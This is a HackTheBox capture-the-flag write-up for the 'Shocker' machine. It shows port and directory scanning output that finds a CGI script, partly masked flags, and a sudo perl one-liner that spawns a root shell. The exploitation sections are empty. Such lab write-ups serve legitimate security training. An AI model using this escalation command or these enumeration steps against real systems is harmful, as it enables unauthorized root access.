Shocker Write-up — HackTheBox

Initial Enumeration:

nmap -sC -vv -sV -nP -O -A -oN nmap_scan.txt $IP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk

Visiting the website:

Main Enumeration:

##dirb:
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:14)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)
##dirsearch:
[05:14:56] Starting:
[05:15:04] 403 - 300B - /.htaccess.bak1
[05:15:04] 403 - 300B - /.htaccess.orig
[05:15:04] 403 - 302B - /.htaccess.sample
[05:15:04] 403 - 300B - /.htaccess.save
[05:15:04] 403 - 298B - /.htaccessBAK
[05:15:04] 403 - 298B - /.htaccessOLD
[05:15:04] 403 - 299B - /.htaccessOLD2
[05:15:04] 403 - 291B - /.html
[05:15:04] 403 - 290B - /.htm
[05:15:04] 403 - 297B - /.httr-oauth
[05:15:42] 403 - 294B - /cgi-bin/
[05:15:56] 200 - 137B - /index.html
[05:16:16] 403 - 299B - /server-status
[05:16:16] 403 - 300B - /server-status/
##gobuster 2nd run:
root@kali:/home/czar/Downloads# gobuster dir -u http://shocker.htb/cgi-bin/ -t 80 -w /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://shocker.htb/cgi-bin/
[+] Threads: 80
[+] Wordlist: /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,sh
[+] Timeout: 10s
===============================================================
2020/11/28 08:23:39 Starting gobuster
===============================================================
/user.sh (Status: 200)
Progress: 2076 / 220561 (0.94%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/28 08:23:58 Finished
===============================================================

Metasploit:

Getting User

shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
44d**************************bb4
shelly@Shocker:/home/shelly$

Privilege Escalation

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo perl -e ‘exec “/bin/sh”;’
# whoami && id
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
4fb5************************ad55

Manuel Exploitation:

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store